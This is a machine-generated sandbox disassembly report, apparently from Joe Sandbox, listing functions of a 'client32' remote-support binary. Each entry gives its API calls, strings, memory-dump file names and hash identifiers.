Opcode Fuzzy Hash: db8ccf8eb5a065f9716819879bea2f70c374054ad31006cd5f0d5a6c3e74d67c
Instruction Fuzzy Hash: 3F117C7680421ABBE702DB618CC8AAEFB7CEFC566AF108029F695D2144E7749541CB63

Function 1103D330 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 319COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1103D3D1
_memmove.LIBCMT ref: 1103D3DE

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Part of subcall function 1103D0B0: Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1

Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D36F, 1103D39E, 1103D3FD, 1103D433, 1103D47C, 1103D4E9, 1103D542, 1103D5CC, 1103D5FF, 1103D669, 1103D6A0
PF%sinclude:*exclude:, xrefs: 1103D492
IsA(), xrefs: 1103D374, 1103D3A3, 1103D402, 1103D438, 1103D481, 1103D4EE, 1103D547, 1103D5D1, 1103D604, 1103D66E, 1103D6A5
redirect:, xrefs: 1103D4A8

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExitProcess$ErrorLastMessageSleep_memmove_memset_strrchrwsprintf
String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$redirect:
API String ID: 118650250-3293259664
Opcode ID: 6de04acfd1c6b93234f2aaac1ec6cebecc2511945347d61253f2623e43f034eb
Instruction ID: 8883845aa1adcb6b462271895c3eb4188d935db878da715d2f936e5278910226
Opcode Fuzzy Hash: 6de04acfd1c6b93234f2aaac1ec6cebecc2511945347d61253f2623e43f034eb
Instruction Fuzzy Hash: 85B1D234E0195A9FDB06DF98CC90FEDB3B5AF89309F448154E82567380EB34A908CBD1

Function 11043050 Relevance: 10.7, APIs: 7, Instructions: 171COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 110430DC

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

_free.LIBCMT ref: 110430FC
_strncpy.LIBCMT ref: 1104312A
_strncpy.LIBCMT ref: 11043167
_strncpy.LIBCMT ref: 110431B2
_strncpy.LIBCMT ref: 110431F2
_strncpy.LIBCMT ref: 1104323B

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy$_free$ErrorFreeHeapLast
String ID:
API String ID: 1231584600-0
Opcode ID: 57f5ffb5089c12c02a377bb6fa8bf421173bcb8552d8deb20583c806e30e8182
Instruction ID: 3e0d8ed6fad75e9b70bada9a66dea6ffd8c5f444cdc47759be8d9c1188c0d16e
Opcode Fuzzy Hash: 57f5ffb5089c12c02a377bb6fa8bf421173bcb8552d8deb20583c806e30e8182
Instruction Fuzzy Hash: FB615DB5E047199FD760CFB9C884BCAFBF9BB55308F0049ADD58997200DAB4A980CF91

Function 1101F140 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101F1B1

Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101F2C5
GetSaveFileNameA.COMDLG32(?), ref: 1101F2E7
_fputs.LIBCMT ref: 1101F313

Strings

X, xrefs: 1101F1C1
ChatPath, xrefs: 1101F2A1

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$FileName$ModuleSave_fputs_memset
String ID: ChatPath$X
API String ID: 2661292734-3955712077
Opcode ID: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
Instruction ID: 6a45e0ccd222e521db2cf8660e7e75a9c6c8819791f7e0b2186df894ceae34f3
Opcode Fuzzy Hash: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
Instruction Fuzzy Hash: 6C51C275E043299FEB21DF60CC48BDEFBB4AF45704F1041D9D909AB280EB75AA84CB91

Function 685BF83F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 685BF872
_siglookup.LIBCMT ref: 685BF899
DecodePointer.KERNEL32(A117076C,685D7798,00000020,685C6C37,00000016,685BB35F,685D75F8,00000008), ref: 685BF8F1
__lock.LIBCMT ref: 685BF918

Strings

x]h, xrefs: 685BF888
|]h, xrefs: 685BF8D3

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: DecodePointer__getptd_noexit__lock_siglookup
String ID: x]h$|]h
API String ID: 2847133137-3415710678
Opcode ID: 913bd4a302714c4e65bd0d560bf3d389b66cbd6a91f30939e1e7b912537498f0
Instruction ID: 6a423b2b62c717f89e4c26c9321ed3089e1d27427b47564b3484ad3124c820e5
Opcode Fuzzy Hash: 913bd4a302714c4e65bd0d560bf3d389b66cbd6a91f30939e1e7b912537498f0
Instruction Fuzzy Hash: 9641903DD00305EBDF08DF78C8A49ACB7B2FF6A354B90442AE821A7651D7B1D840CBA5

Function 685968D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 131COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(685DB898,?,a0Zh,?), ref: 685969EB
_free.LIBCMT ref: 68596A07
LeaveCriticalSection.KERNEL32(685DB898), ref: 68596A1B

Strings

a3Zh, xrefs: 685968D7
FAILED_REASON, xrefs: 685968F7
LICENSE, xrefs: 68596915

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave_free
String ID: FAILED_REASON$LICENSE$a3Zh
API String ID: 2208350527-1175787811
Opcode ID: 086ca56cc5ab5da6217e57da9c43ff2b84f6ab471592071ab0210d865d518beb
Instruction ID: ac1de090c90bd4b24c09c012a49f2b574d1a8716ca1c4b368ad7bfa2d20d91c8
Opcode Fuzzy Hash: 086ca56cc5ab5da6217e57da9c43ff2b84f6ab471592071ab0210d865d518beb
Instruction Fuzzy Hash: E8412636904786ABDF018E7889546AFBBF6AF92384F954165DD999B300EB31DE0CC3D0

Function 68596CC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 68596D0A
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 68596D72
SetLastError.KERNEL32(00000078,?,6859B586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 68596DCC
SetLastError.KERNEL32(00000078,00000000,000000C8,74DEE010,?,6859B586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 68596DD6

Strings

InternetQueryDataAvailable, xrefs: 68596D04
InternetReadFile, xrefs: 68596D6C

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetQueryDataAvailable$InternetReadFile
API String ID: 199729137-1434219782
Opcode ID: f8b5b48bf9d52e37d29461fc61608dc07eaf970f1c38197b50847c1b3ba6ff48
Instruction ID: 0674a1ebc6fa08b114cc084c9108d48255173acde0e7423f15543c24412073e9
Opcode Fuzzy Hash: f8b5b48bf9d52e37d29461fc61608dc07eaf970f1c38197b50847c1b3ba6ff48
Instruction Fuzzy Hash: C9315C75A043999FDF21EF58C890AE9B7F8FB49305F5144EAEA9997200C6705DC8CF90

Function 6859B8E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 6859B941
_free.LIBCMT ref: 6859B952
_malloc.LIBCMT ref: 6859B970
_free.LIBCMT ref: 6859B999
_strtok.LIBCMT ref: 6859B9A5

Part of subcall function 685A7F80: _memset.LIBCMT ref: 685A7F9F
Part of subcall function 685A7F80: LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,?,?,?,?,?,?,?,?,6859B916,?,00000100,00000006,00000001), ref: 685A7FAC
Part of subcall function 685A7F80: GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 685A7FCB
Part of subcall function 685A7F80: _malloc.LIBCMT ref: 685A7FFB
Part of subcall function 685A7F80: wsprintfA.USER32 ref: 685A807C

Part of subcall function 685A7F80: _free.LIBCMT ref: 685A8110
Part of subcall function 685A7F80: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 685A811C

Strings

MACADDRESS=%s, xrefs: 6859B98D

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _free$Library_malloc_strtok$AddressFreeLoadProc_memsetwsprintf
String ID: MACADDRESS=%s
API String ID: 905297018-795797190
Opcode ID: 3cb6843e09a2eda3a758dea4d9b5072d7ccd5de090e112039db481a1addf2959
Instruction ID: 21c847bbd0635fab87172a86c61f57395ec0607bfd8cc4559090a5a2559a5cc2
Opcode Fuzzy Hash: 3cb6843e09a2eda3a758dea4d9b5072d7ccd5de090e112039db481a1addf2959
Instruction Fuzzy Hash: 1521BE75D8026467EB01A2745C85FFEB2AD8F95B08FC00294FD949F280FAB1DD0482D1

Function 6859BC60 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 68595060: _free.LIBCMT ref: 6859506A
Part of subcall function 68595060: _malloc.LIBCMT ref: 68595090

Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26

_free.LIBCMT ref: 6859BCBA

Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25

_free.LIBCMT ref: 6859BCEC

Strings

APPTYPE=%d, xrefs: 6859BCFF
DEPT=%s, xrefs: 6859BCE0
CMD=USERSTATUS, xrefs: 6859BC81
USER=%s, xrefs: 6859BCAE

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
String ID: APPTYPE=%d$CMD=USERSTATUS$DEPT=%s$USER=%s
API String ID: 3180605519-731630419
Opcode ID: 5d4a91f6150d5361a5f9186fb579d58b425feeb3b5db5a0a2f31cabd42635760
Instruction ID: 9a82cf1656c9452d65eca618102cadfb1609bae206420f3180e89e9225d958c6
Opcode Fuzzy Hash: 5d4a91f6150d5361a5f9186fb579d58b425feeb3b5db5a0a2f31cabd42635760
Instruction Fuzzy Hash: E02162BA940208BBDB00DBA5CC91FFFB77CDF84604F808548AE16A7144EB30AA1587E5

Function 6859AEA0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26

Part of subcall function 68595060: _free.LIBCMT ref: 6859506A
Part of subcall function 68595060: _malloc.LIBCMT ref: 68595090

_free.LIBCMT ref: 6859AF0A

Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25

_free.LIBCMT ref: 6859AF39

Part of subcall function 685A7B60: _sprintf.LIBCMT ref: 685A7B77

Part of subcall function 685A77E0: _free.LIBCMT ref: 685A77EF

Strings

REQUESTING_HELP=%d, xrefs: 6859AED6
CHANNEL=%s, xrefs: 6859AF2D
CMD=STATUS, xrefs: 6859AEC0
USERNAME=%s, xrefs: 6859AEFE

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast__vswprintf_malloc_sprintf
String ID: CHANNEL=%s$CMD=STATUS$REQUESTING_HELP=%d$USERNAME=%s
API String ID: 1628406020-2994292602
Opcode ID: 892e281234f6473bb2959472ca80297a582671a34a95ef773a8f78f04b0eb075
Instruction ID: 4a9545b6700c8e23bd4afdbfca98310cda60e884f096ac6c9a6e1bb61ca69042
Opcode Fuzzy Hash: 892e281234f6473bb2959472ca80297a582671a34a95ef773a8f78f04b0eb075
Instruction Fuzzy Hash: DF21627A940108BBCB11DBE4CC91FFFBB7C9B94604F904148EA02B7244EB30AE5687E4

Function 685A5C90 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 685A5CBF

Part of subcall function 685A33A0: wsprintfA.USER32 ref: 685A34FD

Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26

Strings

226546, xrefs: 685A5D51
PIN=%s, xrefs: 685A5D6E
CMD=CLEAR_PIN, xrefs: 685A5D46
PINserver, xrefs: 685A5CD0
CLIENT_NAME=%s, xrefs: 685A5D5C

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: __vswprintf_memsetwsprintf
String ID: 226546$CLIENT_NAME=%s$CMD=CLEAR_PIN$PIN=%s$PINserver
API String ID: 518437271-364928423
Opcode ID: 2a83d22bae4ca295b005445554e020a375a34d2fb1597c9142aa2b8f48517b7a
Instruction ID: 87bf498cc7594ea23bf686710cdccebbedf05ac24f80792fd81c736b92ae0aad
Opcode Fuzzy Hash: 2a83d22bae4ca295b005445554e020a375a34d2fb1597c9142aa2b8f48517b7a
Instruction Fuzzy Hash: ED214875D00218AADB50DB788C81FEEB7B9AB84214F9081D9F95DE7181EF305E858F74

Function 685B7A09 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 685B7960

Part of subcall function 685BF4BC: __mtinitlocknum.LIBCMT ref: 685BF4D2
Part of subcall function 685BF4BC: __amsg_exit.LIBCMT ref: 685BF4DE
Part of subcall function 685BF4BC: EnterCriticalSection.KERNEL32(00000000,00000000,?,685B6E81,0000000D), ref: 685BF4E6

InterlockedDecrement.KERNEL32(00000000), ref: 685B7972
_free.LIBCMT ref: 685B7987

Part of subcall function 685B1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 685B1C13
Part of subcall function 685B1BFD: GetLastError.KERNEL32(00000000), ref: 685B1C25

__lock.LIBCMT ref: 685B79A0
___removelocaleref.LIBCMT ref: 685B79AF
___freetlocinfo.LIBCMT ref: 685B79C8
_free.LIBCMT ref: 685B79E5

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 556454624-0
Opcode ID: 25cecdea0503b95306d972855dcf6e7eae7708cf6fa6d872a3b71aa226b00dbd
Instruction ID: 3e486e7ca42d2cf214fb69cd9c9074a118e7d7ad972570e6219f1a43b1f2ec45
Opcode Fuzzy Hash: 25cecdea0503b95306d972855dcf6e7eae7708cf6fa6d872a3b71aa226b00dbd
Instruction Fuzzy Hash: 5511A039501704DBDB209F788524B6E73F5AF60724FE04519E4B5EB1D0EB34CD80C6A4

Function 1100B290 Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 1100B2A0
EnterCriticalSection.KERNEL32(?), ref: 1100B2D9
EnterCriticalSection.KERNEL32(?), ref: 1100B2F8

Part of subcall function 1100A200: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1100A21E
Part of subcall function 1100A200: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A248
Part of subcall function 1100A200: GetLastError.KERNEL32 ref: 1100A250
Part of subcall function 1100A200: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A264
Part of subcall function 1100A200: CloseHandle.KERNEL32(00000000), ref: 1100A26B

waveOutUnprepareHeader.WINMM(00000000,?,00000020), ref: 1100B308
LeaveCriticalSection.KERNEL32(?), ref: 1100B30F
_free.LIBCMT ref: 1100B318
_free.LIBCMT ref: 1100B31E

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
